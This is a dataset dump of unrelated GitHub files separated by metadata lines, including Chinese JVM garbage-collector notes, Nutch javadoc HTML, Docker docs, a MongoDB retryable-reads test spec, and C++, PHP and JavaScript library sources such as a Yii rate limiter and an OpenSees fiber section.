并发阶段, 虽然不会停止业务线程, 但是因为占用了一部分CPU资源, 从而会导致应用程序变慢, 导致总吞吐量变低 * CMS默认启动的回收线程数:(CPU数量 + 3) / 4, 也就是说在CPU核心数 >= 4的时候, 并发回收时, 占用 25% d CPU资源 * 如果CPU核心数不足 4, 业务线程受到的影响就比较大了, 因为需要付出一半的算力去执行GC * 为了解决这个问题, JVM提供了一种"增量式并发收集器" , 没用,已经被标识为过时 2, 无法处理浮动垃圾, 可能出现:Concurrent Mode Failure 失败而导致另一次Full GC的产生 * 浮动垃圾就是, 在执行并发清理的时候, 因为是并发,业务线程不会停止, 在此期间产生的垃圾, 只能在下一次GC处理 * 也就是说要留足内存空间给业务线程使用, 因此CMS不能跟其他的收集器一样要等到老年代几乎被完全填满了后再进行收集,因为需要预留空间给并发业务线程使用 * JDK1.5环境下,默认老年代内存使用了 68%后, 就会触发该收集器, 这个设置比较保守 * 如果中老年代增长不是很快, 可以适当的调高参数(0 - 100 百分比), 降低GC次数 -XX:CMSInitiatingOccupancyFraction * 如果CMS运行期间,预留的内存不足以业务线程的使用, 就会出现一次:Concurrent Mode Failure 失败 * 这是JVM会启动预案, 临时启动:Serial Old 收集器来重新对老年代进行垃圾收集 * 也就是说-XX:CMSInitiatingOccupancyFraction设置太高, 可能会导致大量的Concurrent Mode Failure 失败, 性能反而降低 3, 因为使用标记清除算法,导致大量的内存碎片 * 碎片过多, 这会给内存分配带来很大的麻烦 * 往往老年代还有足够的内存, 但是因为找不到连续的空间不得不触发一次 Full GC * 为了解决这个问题,CMS提供了一个参数(默认已经开启) -XX:+UseCMSCompactAtFullCollection * 用于在CMS顶不住要进行Full GC的时候, 开启内存碎片的合并整理过程 * 内存整理的国产没法并发, 空间随便问题解决了, 但是业务线程停顿时间不得不变长了 * 设置执行多少次不压缩的FullGC后, 跟着来一次带压缩的 -XX:CMSFullGCsBeforeCompaction * 默认为0, 表示每次进入Full GC时都进行碎片整理 -------------------------- G1收集器 | -------------------------- # Garbage-First, 收集器是当前收集器技术发展的最前沿成果之一 * 从JDK7开始 * 设计的目标就是为了替代掉:Concurrent Mark Sweep(CMS) 收集器 # 它是全堆收集器, 老年代, 新生代都行 # 因为是全堆收集器, 所以使用G1的时候, 内存布局就有点儿与其他的收集器不同 * 它把整个堆划分为多个相等大小的独立区域(Region) * 还是保留了新生代, 老年代的概念, 但是新生代和老年代不再是物理隔离了, 它们都是一部分 Region 的集合 * 引入了分区的概念, 弱到了分代的概念 # 比较重要, 单独写
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_55) on Tue Aug 12 22:14:04 PDT 2014 --> <title>org.apache.nutch.microformats.reltag Class Hierarchy (apache-nutch 1.9 API)</title> <meta name="date" content="2014-08-12"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="org.apache.nutch.microformats.reltag Class Hierarchy (apache-nutch 1.9 API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/nutch/metadata/package-tree.html">Prev</a></li> <li><a href="../../../../../org/apache/nutch/net/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/nutch/microformats/reltag/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 class="title">Hierarchy For Package org.apache.nutch.microformats.reltag</h1> <span class="strong">Package Hierarchies:</span> <ul class="horizontal"> <li><a href="../../../../../overview-tree.html">All Packages</a></li> </ul> </div> <div class="contentContainer"> <h2 title="Class Hierarchy">Class Hierarchy</h2> <ul> <li type="circle">java.lang.<a href="http://java.sun.com/javase/6/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang"><span class="strong">Object</span></a> <ul> <li type="circle">org.apache.nutch.microformats.reltag.<a href="../../../../../org/apache/nutch/microformats/reltag/RelTagIndexingFilter.html" title="class in org.apache.nutch.microformats.reltag"><span class="strong">RelTagIndexingFilter</span></a> (implements org.apache.nutch.indexer.<a href="../../../../../org/apache/nutch/indexer/IndexingFilter.html" title="interface in org.apache.nutch.indexer">IndexingFilter</a>)</li> <li type="circle">org.apache.nutch.microformats.reltag.<a href="../../../../../org/apache/nutch/microformats/reltag/RelTagParser.html" title="class in org.apache.nutch.microformats.reltag"><span class="strong">RelTagParser</span></a> (implements org.apache.nutch.parse.<a href="../../../../../org/apache/nutch/parse/HtmlParseFilter.html" title="interface in org.apache.nutch.parse">HtmlParseFilter</a>)</li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/nutch/metadata/package-tree.html">Prev</a></li> <li><a href="../../../../../org/apache/nutch/net/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/nutch/microformats/reltag/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &copy; 2014 The Apache Software Foundation</small></p> </body> </html>
{ "pile_set_name": "Github" }
--- title: Docker 应用的开发环境 description: 了解支持 Docker 开发生命周期的最重要的开发工具选项。 ms.date: 08/06/2020 ms.openlocfilehash: 07b42b2bd05ab16ba0fbf61863b050ee2c9e242b ms.sourcegitcommit: ef50c99928183a0bba75e07b9f22895cd4c480f8 ms.translationtype: HT ms.contentlocale: zh-CN ms.lasthandoff: 08/07/2020 ms.locfileid: "87916034" --- # <a name="development-environment-for-docker-apps"></a>Docker 应用的开发环境 ## <a name="development-tools-choices-ide-or-editor"></a>开发工具选择:IDE 或编辑器 无论你更青睐内容丰富、功能强大的 IDE 还是灵活轻量的编辑器,Microsoft 在开发 Docker 应用程序时都能满足你的需求。 ### <a name="visual-studio-code-and-docker-cli-cross-platform-tools-for-mac-linux-and-windows"></a>Visual Studio Code 和 Docker CLI(适用于 Mac、Linux 和 Windows 的跨平台工具) 如果更青睐支持任何开发语言的轻量级跨平台编辑器,可以使用 Visual Studio Code 和 Docker CLI。 这些产品提供简单而可靠的体验,这对简化开发人员工作流至关重要。 安装“用于 Mac 的 Docker”或“用于 Windows 的 Docker”(开发环境),Docker 开发人员即可使用单个 Docker CLI 为 Windows 或 Linux(运行时环境)构建应用。 此外,Visual Studio Code 还支持 Docker 扩展(例如适用于 Dockerfile 的 IntelliSense)和在编辑器中运行 Docker 命令的快捷任务。 > [!NOTE] > 要下载 Visual Studio Code,请转到 <https://code.visualstudio.com/download>。 > > 要下载用于 Mac 和 Windows 的 Docker,请转到 <https://www.docker.com/products/docker>。 ### <a name="visual-studio-with-docker-tools-windows-development-machine"></a>附带 Docker 工具的 Visual Studio(Windows 开发计算机) 建议使用 Visual Studio 2019 并启用内置 Docker 工具。 使用 Visual Studio,可以直接在所选的 Docker 环境中开发、运行和验证应用程序。 按 F5,即可直接在 Docker 主机中调试应用程序(单个容器或多个容器);也可以按 Ctrl+F5,无需重新生成容器,即可编辑并刷新应用。 对于创建用于 Linux 或 Windows 的 Docker 容器的 Windows 开发人员,这是最简单且功能最强大的选择。 ### <a name="visual-studio-for-mac-mac-development-machine"></a>Visual Studio for Mac(Mac 开发计算机) 开发基于 Docker 的应用程序时,可以使用 [Visual Studio for Mac](https://visualstudio.microsoft.com/vs/mac/?utm_medium=microsoft&utm_source=docs.microsoft.com&utm_campaign=inline+link)。 与 Visual Studio Code for Mac 相比,Visual Studio for Mac 提供了更丰富的 IDE。 ## <a name="language-and-framework-choices"></a>选择语言和框架 可以使用 Microsoft 工具和大多数现代语言开发 Docker 应用程序。 以下是初始列表,但不局限于该表: - .NET Core 和 ASP.NET Core - Node.js - Go - Java - Ruby - Python 基本上可以使用由 Linux 或 Windows 中的 Docker 支持的任何现代语言。 >[!div class="step-by-step"] >[上一页](deploy-azure-kubernetes-service.md) >[下一页](docker-apps-inner-loop-workflow.md)
{ "pile_set_name": "Github" }
{ "runOn": [ { "minServerVersion": "4.0", "topology": [ "single", "replicaset" ] }, { "minServerVersion": "4.1.7", "topology": [ "sharded" ] } ], "database_name": "retryable-reads-tests", "collection_name": "coll", "data": [], "tests": [ { "description": "ListCollectionNames succeeds on first attempt", "operations": [ { "name": "listCollectionNames", "object": "database" } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } } ] }, { "description": "ListCollectionNames succeeds on second attempt", "failPoint": { "configureFailPoint": "failCommand", "mode": { "times": 1 }, "data": { "failCommands": [ "listCollections" ], "closeConnection": true } }, "operations": [ { "name": "listCollectionNames", "object": "database" } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } }, { "command_started_event": { "command": { "listCollections": 1 } } } ] }, { "description": "ListCollectionNames fails on first attempt", "clientOptions": { "retryReads": false }, "failPoint": { "configureFailPoint": "failCommand", "mode": { "times": 1 }, "data": { "failCommands": [ "listCollections" ], "closeConnection": true } }, "operations": [ { "name": "listCollectionNames", "object": "database", "error": true } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } } ] }, { "description": "ListCollectionNames fails on second attempt", "failPoint": { "configureFailPoint": "failCommand", "mode": { "times": 2 }, "data": { "failCommands": [ "listCollections" ], "closeConnection": true } }, "operations": [ { "name": "listCollectionNames", "object": "database", "error": true } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } }, { "command_started_event": { "command": { "listCollections": 1 } } } ] } ] }
{ "pile_set_name": "Github" }
// File: lzham_prefix_coding.h // See Copyright Notice and license at the end of include/lzham.h #pragma once namespace lzham { namespace prefix_coding { const uint cMaxExpectedCodeSize = 16; const uint cMaxSupportedSyms = 1024; // This value can be tuned for a specific CPU. const uint cMaxTableBits = 11; bool limit_max_code_size(uint num_syms, uint8* pCodesizes, uint max_code_size); bool generate_codes(uint num_syms, const uint8* pCodesizes, uint16* pCodes); class decoder_tables { public: inline decoder_tables() : m_table_shift(0), m_table_max_code(0), m_decode_start_code_size(0), m_cur_lookup_size(0), m_lookup(NULL), m_cur_sorted_symbol_order_size(0), m_sorted_symbol_order(NULL) { } inline decoder_tables(const decoder_tables& other) : m_table_shift(0), m_table_max_code(0), m_decode_start_code_size(0), m_cur_lookup_size(0), m_lookup(NULL), m_cur_sorted_symbol_order_size(0), m_sorted_symbol_order(NULL) { *this = other; } inline decoder_tables& operator= (const decoder_tables& rhs) { assign(rhs); return *this; } inline bool assign(const decoder_tables& rhs) { if (this == &rhs) return true; uint32* pCur_lookup = m_lookup; uint16* pCur_sorted_symbol_order = m_sorted_symbol_order; memcpy(this, &rhs, sizeof(*this)); if ((pCur_lookup) && (pCur_sorted_symbol_order) && (rhs.m_cur_lookup_size == m_cur_lookup_size) && (rhs.m_cur_sorted_symbol_order_size == m_cur_sorted_symbol_order_size)) { m_lookup = pCur_lookup; m_sorted_symbol_order = pCur_sorted_symbol_order; memcpy(m_lookup, rhs.m_lookup, sizeof(m_lookup[0]) * m_cur_lookup_size); memcpy(m_sorted_symbol_order, rhs.m_sorted_symbol_order, sizeof(m_sorted_symbol_order[0]) * m_cur_sorted_symbol_order_size); } else { lzham_delete_array(pCur_lookup); m_lookup = NULL; if (rhs.m_lookup) { m_lookup = lzham_new_array<uint32>(m_cur_lookup_size); if (!m_lookup) return false; memcpy(m_lookup, rhs.m_lookup, sizeof(m_lookup[0]) * m_cur_lookup_size); } lzham_delete_array(pCur_sorted_symbol_order); m_sorted_symbol_order = NULL; if (rhs.m_sorted_symbol_order) { m_sorted_symbol_order = lzham_new_array<uint16>(m_cur_sorted_symbol_order_size); if (!m_sorted_symbol_order) return false; memcpy(m_sorted_symbol_order, rhs.m_sorted_symbol_order, sizeof(m_sorted_symbol_order[0]) * m_cur_sorted_symbol_order_size); } } return true; } inline void clear() { if (m_lookup) { lzham_delete_array(m_lookup); m_lookup = 0; m_cur_lookup_size = 0; } if (m_sorted_symbol_order) { lzham_delete_array(m_sorted_symbol_order); m_sorted_symbol_order = NULL; m_cur_sorted_symbol_order_size = 0; } } inline ~decoder_tables() { if (m_lookup) lzham_delete_array(m_lookup); if (m_sorted_symbol_order) lzham_delete_array(m_sorted_symbol_order); } // DO NOT use any complex classes here - it is bitwise copied. uint m_num_syms; uint m_total_used_syms; uint m_table_bits; uint m_table_shift; uint m_table_max_code; uint m_decode_start_code_size; uint8 m_min_code_size; uint8 m_max_code_size; uint m_max_codes[cMaxExpectedCodeSize + 1]; int m_val_ptrs[cMaxExpectedCodeSize + 1]; uint m_cur_lookup_size; uint32* m_lookup; uint m_cur_sorted_symbol_order_size; uint16* m_sorted_symbol_order; inline uint get_unshifted_max_code(uint len) const { LZHAM_ASSERT( (len >= 1) && (len <= cMaxExpectedCodeSize) ); uint k = m_max_codes[len - 1]; if (!k) return UINT_MAX; return (k - 1) >> (16 - len); } }; bool generate_decoder_tables(uint num_syms, const uint8* pCodesizes, decoder_tables* pTables, uint table_bits); } // namespace prefix_coding } // namespace lzham
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <resources> <style name="MainTheme" parent="MainTheme.Base"> </style> <!-- Base theme applied no matter what API --> <style name="MainTheme.Base" parent="Theme.AppCompat.Light.DarkActionBar"> <!--If you are using revision 22.1 please use just windowNoTitle. Without android:--> <item name="windowNoTitle">true</item> <!--We will be using the toolbar so no need to show ActionBar--> <item name="windowActionBar">false</item> <!-- Set theme colors from http://www.google.com/design/spec/style/color.html#color-color-palette --> <!-- colorPrimary is used for the default action bar background --> <item name="colorPrimary">#2196F3</item> <!-- colorPrimaryDark is used for the status bar --> <item name="colorPrimaryDark">#1976D2</item> <!-- colorAccent is used as the default value for colorControlActivated which is used to tint widgets --> <item name="colorAccent">#FF4081</item> <!-- You can also set colorControlNormal, colorControlActivated colorControlHighlight and colorSwitchThumbNormal. --> <item name="windowActionModeOverlay">true</item> <item name="android:datePickerDialogTheme">@style/AppCompatDialogStyle</item> </style> <style name="AppCompatDialogStyle" parent="Theme.AppCompat.Light.Dialog"> <item name="colorAccent">#FF4081</item> </style> </resources>
{ "pile_set_name": "Github" }
<?php /** * @link http://www.yiiframework.com/ * @copyright Copyright (c) 2008 Yii Software LLC * @license http://www.yiiframework.com/license/ */ namespace yii\filters; use Yii; use yii\base\ActionFilter; use yii\web\Request; use yii\web\Response; use yii\web\TooManyRequestsHttpException; /** * RateLimiter implements a rate limiting algorithm based on the [leaky bucket algorithm](http://en.wikipedia.org/wiki/Leaky_bucket). * * You may use RateLimiter by attaching it as a behavior to a controller or module, like the following, * * ```php * public function behaviors() * { * return [ * 'rateLimiter' => [ * 'class' => \yii\filters\RateLimiter::className(), * ], * ]; * } * ``` * * When the user has exceeded his rate limit, RateLimiter will throw a [[TooManyRequestsHttpException]] exception. * * Note that RateLimiter requires [[user]] to implement the [[RateLimitInterface]]. RateLimiter will * do nothing if [[user]] is not set or does not implement [[RateLimitInterface]]. * * @author Qiang Xue <qiang.xue@gmail.com> * @since 2.0 */ class RateLimiter extends ActionFilter { /** * @var bool whether to include rate limit headers in the response */ public $enableRateLimitHeaders = true; /** * @var string the message to be displayed when rate limit exceeds */ public $errorMessage = 'Rate limit exceeded.'; /** * @var RateLimitInterface the user object that implements the RateLimitInterface. * If not set, it will take the value of `Yii::$app->user->getIdentity(false)`. */ public $user; /** * @var Request the current request. If not set, the `request` application component will be used. */ public $request; /** * @var Response the response to be sent. If not set, the `response` application component will be used. */ public $response; /** * @inheritdoc */ public function init() { if ($this->request === null) { $this->request = Yii::$app->getRequest(); } if ($this->response === null) { $this->response = Yii::$app->getResponse(); } } /** * @inheritdoc */ public function beforeAction($action) { if ($this->user === null && Yii::$app->getUser()) { $this->user = Yii::$app->getUser()->getIdentity(false); } if ($this->user instanceof RateLimitInterface) { Yii::trace('Check rate limit', __METHOD__); $this->checkRateLimit($this->user, $this->request, $this->response, $action); } elseif ($this->user) { Yii::info('Rate limit skipped: "user" does not implement RateLimitInterface.', __METHOD__); } else { Yii::info('Rate limit skipped: user not logged in.', __METHOD__); } return true; } /** * Checks whether the rate limit exceeds. * @param RateLimitInterface $user the current user * @param Request $request * @param Response $response * @param \yii\base\Action $action the action to be executed * @throws TooManyRequestsHttpException if rate limit exceeds */ public function checkRateLimit($user, $request, $response, $action) { $current = time(); list ($limit, $window) = $user->getRateLimit($request, $action); list ($allowance, $timestamp) = $user->loadAllowance($request, $action); $allowance += (int) (($current - $timestamp) * $limit / $window); if ($allowance > $limit) { $allowance = $limit; } if ($allowance < 1) { $user->saveAllowance($request, $action, 0, $current); $this->addRateLimitHeaders($response, $limit, 0, $window); throw new TooManyRequestsHttpException($this->errorMessage); } else { $user->saveAllowance($request, $action, $allowance - 1, $current); $this->addRateLimitHeaders($response, $limit, $allowance - 1, (int) (($limit - $allowance) * $window / $limit)); } } /** * Adds the rate limit headers to the response * @param Response $response * @param int $limit the maximum number of allowed requests during a period * @param int $remaining the remaining number of allowed requests within the current period * @param int $reset the number of seconds to wait before having maximum number of allowed requests again */ public function addRateLimitHeaders($response, $limit, $remaining, $reset) { if ($this->enableRateLimitHeaders) { $response->getHeaders() ->set('X-Rate-Limit-Limit', $limit) ->set('X-Rate-Limit-Remaining', $remaining) ->set('X-Rate-Limit-Reset', $reset); } } }
{ "pile_set_name": "Github" }
/** * @author: aperez <aperez@datadec.es> * @version: v2.0.0 * * @update Dennis Hernández <http://djhvscf.github.io/Blog> */ !function($) { 'use strict'; var firstLoad = false; var sprintf = $.fn.bootstrapTable.utils.sprintf; var showAvdSearch = function(pColumns, searchTitle, searchText, that) { if (!$("#avdSearchModal" + "_" + that.options.idTable).hasClass("modal")) { var vModal = sprintf("<div id=\"avdSearchModal%s\" class=\"modal fade\" tabindex=\"-1\" role=\"dialog\" aria-labelledby=\"mySmallModalLabel\" aria-hidden=\"true\">", "_" + that.options.idTable); vModal += "<div class=\"modal-dialog modal-xs\">"; vModal += " <div class=\"modal-content\">"; vModal += " <div class=\"modal-header\">"; vModal += " <button type=\"button\" class=\"close\" data-dismiss=\"modal\" aria-hidden=\"true\" >&times;</button>"; vModal += sprintf(" <h4 class=\"modal-title\">%s</h4>", searchTitle); vModal += " </div>"; vModal += " <div class=\"modal-body modal-body-custom\">"; vModal += sprintf(" <div class=\"container-fluid\" id=\"avdSearchModalContent%s\" style=\"padding-right: 0px;padding-left: 0px;\" >", "_" + that.options.idTable); vModal += " </div>"; vModal += " </div>"; vModal += " </div>"; vModal += " </div>"; vModal += "</div>"; $("body").append($(vModal)); var vFormAvd = createFormAvd(pColumns, searchText, that), timeoutId = 0;; $('#avdSearchModalContent' + "_" + that.options.idTable).append(vFormAvd.join('')); $('#' + that.options.idForm).off('keyup blur', 'input').on('keyup blur', 'input', function (event) { clearTimeout(timeoutId); timeoutId = setTimeout(function () { that.onColumnAdvancedSearch(event); }, that.options.searchTimeOut); }); $("#btnCloseAvd" + "_" + that.options.idTable).click(function() { $("#avdSearchModal" + "_" + that.options.idTable).modal('hide'); }); $("#avdSearchModal" + "_" + that.options.idTable).modal(); } else { $("#avdSearchModal" + "_" + that.options.idTable).modal(); } }; var createFormAvd = function(pColumns, searchText, that) { var htmlForm = []; htmlForm.push(sprintf('<form class="form-horizontal" id="%s" action="%s" >', that.options.idForm, that.options.actionForm)); for (var i in pColumns) { var vObjCol = pColumns[i]; if (!vObjCol.checkbox && vObjCol.visible && vObjCol.searchable) { htmlForm.push('<div class="form-group">'); htmlForm.push(sprintf('<label class="col-sm-4 control-label">%s</label>', vObjCol.title)); htmlForm.push('<div class="col-sm-6">'); htmlForm.push(sprintf('<input type="text" class="form-control input-md" name="%s" placeholder="%s" id="%s">', vObjCol.field, vObjCol.title, vObjCol.field)); htmlForm.push('</div>'); htmlForm.push('</div>'); } } htmlForm.push('<div class="form-group">'); htmlForm.push('<div class="col-sm-offset-9 col-sm-3">'); htmlForm.push(sprintf('<button type="button" id="btnCloseAvd%s" class="btn btn-default" >%s</button>', "_" + that.options.idTable, searchText)); htmlForm.push('</div>'); htmlForm.push('</div>'); htmlForm.push('</form>'); return htmlForm; }; $.extend($.fn.bootstrapTable.defaults, { advancedSearch: false, idForm: 'advancedSearch', actionForm: '', idTable: undefined, onColumnAdvancedSearch: function (field, text) { return false; } }); $.extend($.fn.bootstrapTable.defaults.icons, { advancedSearchIcon: 'glyphicon-chevron-down' }); $.extend($.fn.bootstrapTable.Constructor.EVENTS, { 'column-advanced-search.bs.table': 'onColumnAdvancedSearch' }); $.extend($.fn.bootstrapTable.locales, { formatAdvancedSearch: function() { return 'Advanced search'; }, formatAdvancedCloseButton: function() { return "Close"; } }); $.extend($.fn.bootstrapTable.defaults, $.fn.bootstrapTable.locales); var BootstrapTable = $.fn.bootstrapTable.Constructor, _initToolbar = BootstrapTable.prototype.initToolbar, _load = BootstrapTable.prototype.load, _initSearch = BootstrapTable.prototype.initSearch; BootstrapTable.prototype.initToolbar = function() { _initToolbar.apply(this, Array.prototype.slice.apply(arguments)); if (!this.options.search) { return; } if (!this.options.advancedSearch) { return; } if (!this.options.idTable) { return; } var that = this, html = []; html.push(sprintf('<div class="columns columns-%s btn-group pull-%s" role="group">', this.options.buttonsAlign, this.options.buttonsAlign)); html.push(sprintf('<button class="btn btn-default%s' + '" type="button" name="advancedSearch" aria-label="advanced search" title="%s">', that.options.iconSize === undefined ? '' : ' btn-' + that.options.iconSize, that.options.formatAdvancedSearch())); html.push(sprintf('<i class="%s %s"></i>', that.options.iconsPrefix, that.options.icons.advancedSearchIcon)) html.push('</button></div>'); that.$toolbar.prepend(html.join('')); that.$toolbar.find('button[name="advancedSearch"]') .off('click').on('click', function() { showAvdSearch(that.columns, that.options.formatAdvancedSearch(), that.options.formatAdvancedCloseButton(), that); }); }; BootstrapTable.prototype.load = function(data) { _load.apply(this, Array.prototype.slice.apply(arguments)); if (!this.options.advancedSearch) { return; } if (typeof this.options.idTable === 'undefined') { return; } else { if (!firstLoad) { var height = parseInt($(".bootstrap-table").height()); height += 10; $("#" + this.options.idTable).bootstrapTable("resetView", {height: height}); firstLoad = true; } } }; BootstrapTable.prototype.initSearch = function () { _initSearch.apply(this, Array.prototype.slice.apply(arguments)); if (!this.options.advancedSearch) { return; } var that = this; var fp = $.isEmptyObject(this.filterColumnsPartial) ? null : this.filterColumnsPartial; this.data = fp ? $.grep(this.data, function (item, i) { for (var key in fp) { var fval = fp[key].toLowerCase(); var value = item[key]; value = $.fn.bootstrapTable.utils.calculateObjectValue(that.header, that.header.formatters[$.inArray(key, that.header.fields)], [value, item, i], value); if (!($.inArray(key, that.header.fields) !== -1 && (typeof value === 'string' || typeof value === 'number') && (value + '').toLowerCase().indexOf(fval) !== -1)) { return false; } } return true; }) : this.data; }; BootstrapTable.prototype.onColumnAdvancedSearch = function (event) { var text = $.trim($(event.currentTarget).val()); var $field = $(event.currentTarget)[0].id; if ($.isEmptyObject(this.filterColumnsPartial)) { this.filterColumnsPartial = {}; } if (text) { this.filterColumnsPartial[$field] = text; } else { delete this.filterColumnsPartial[$field]; } this.options.pageNumber = 1; this.onSearch(event); this.updatePagination(); this.trigger('column-advanced-search', $field, text); }; }(jQuery);
{ "pile_set_name": "Github" }
/* ****************************************************************** ** ** OpenSees - Open System for Earthquake Engineering Simulation ** ** Pacific Earthquake Engineering Research Center ** ** ** ** ** ** (C) Copyright 1999, The Regents of the University of California ** ** All Rights Reserved. ** ** ** ** Commercial use of this program without express permission of the ** ** University of California, Berkeley, is strictly prohibited. See ** ** file 'COPYRIGHT' in main directory for information on usage and ** ** redistribution, and for a DISCLAIMER OF ALL WARRANTIES. ** ** ** ** Developed by: ** ** Frank McKenna (fmckenna@ce.berkeley.edu) ** ** Gregory L. Fenves (fenves@ce.berkeley.edu) ** ** Filip C. Filippou (filippou@ce.berkeley.edu) ** ** ** ** ****************************************************************** */ // $Revision: 1.3 $ // $Date: 2010-02-04 19:10:34 $ // $Source: /usr/local/cvs/OpenSees/SRC/material/section/WFFiberSection2d.cpp,v $ // Written: MHS // Created: Aug 2001 // // Description: This file contains the class definition for // WFFiberSection2d.h. WFFiberSection2d provides the abstraction of a // rectangular section discretized by fibers. The section stiffness and // stress resultants are obtained by summing fiber contributions. // The fiber stresses are the 11, 12, and 13 components of stress, from // which all six beam stress resultants are obtained. #include <stdlib.h> #include <Channel.h> #include <Vector.h> #include <Matrix.h> #include <classTags.h> #include <WFFiberSection2d.h> #include <ID.h> #include <FEM_ObjectBroker.h> #include <UniaxialMaterial.h> // constructors: WFFiberSection2d::WFFiberSection2d(int tag, UniaxialMaterial &theMat, double D, double Tw, double Bf, double Tf, int Nfdw, int Nftf): FiberSection2d(), d(D), tw(Tw), bf(Bf), tf(Tf), nfdw(Nfdw), nftf(Nftf) { int numFibers = nfdw + 2*nftf; for (int i = 0; i < numFibers; i++) { theMaterials[i] = theMat.getCopy(); if (theMaterials[i] == 0) opserr << "WFFiberSection2d::WFFiberSection2d -- failed to get copy of beam fiber" << endln; } double dw = d-2*tf; double a_f = bf*tf/nftf; double a_w = dw*tw/nfdw; int loc = 0; double yIncr = tf/nftf; double yStart = 0.5*d - 0.5*yIncr; double *AFibers = new double[numFibers]; double *yFibers = new double[numFibers]; for (loc = 0; loc < nftf; loc++) { AFibers[loc] = a_f; yFibers[loc] = yStart - yIncr*loc; AFibers[numFibers-loc-1] = a_f; yFibers[numFibers-loc-1] = -yFibers[loc]; } yIncr = dw/nfdw; yStart = 0.5*dw - 0.5*yIncr; int count = 0; for ( ; loc < numFibers-nftf; loc++, count++) { AFibers[loc] = a_w; yFibers[loc] = yStart - yIncr*count; } for (int i = 0; i < numFibers; i++) { matData[i*2] = -yFibers[i]; matData[i*2+1] = AFibers[i]; } delete [] yFibers; delete [] AFibers; } // constructor for blank object that recvSelf needs to be invoked upon WFFiberSection2d::WFFiberSection2d(): FiberSection2d(), d(0.0), tw(0.0), bf(0.0), tf(0.0), nfdw(0), nftf(0) { } // destructor: WFFiberSection2d::~WFFiberSection2d() { } SectionForceDeformation* WFFiberSection2d::getCopy(void) { WFFiberSection2d *theCopy = new WFFiberSection2d (this->getTag(), *theMaterials[0], d, tw, bf, tf, nfdw, nftf); return theCopy; } int WFFiberSection2d::sendSelf(int commitTag, Channel &theChannel) { return -1; } int WFFiberSection2d::recvSelf(int commitTag, Channel &theChannel, FEM_ObjectBroker &theBroker) { return -1; } void WFFiberSection2d::Print(OPS_Stream &s, int flag) { s << "\nWFFiberSection2d, tag: " << this->getTag() << endln; s << "\tSection depth: " << d << endln; s << "\tWeb thickness: " << tw << endln; s << "\tFlange width: " << bf << endln; s << "\tFlange thickness: " << tf << endln; FiberSection2d::Print(s, flag); } const Vector & WFFiberSection2d::getStressResultantSensitivity(int gradIndex, bool conditional) { static Vector ds; // get material stress contribution ds = FiberSection2d::getStressResultantSensitivity(gradIndex, conditional); double y, A, stressGradient; int loc = 0; for (int i = 0; i < numFibers; i++) { y = matData[loc++]; A = matData[loc++]; stressGradient = theMaterials[i]->getStressSensitivity(gradIndex,true); stressGradient = stressGradient * A; ds(0) += stressGradient; ds(1) += stressGradient * y; } return ds; }
{ "pile_set_name": "Github" }
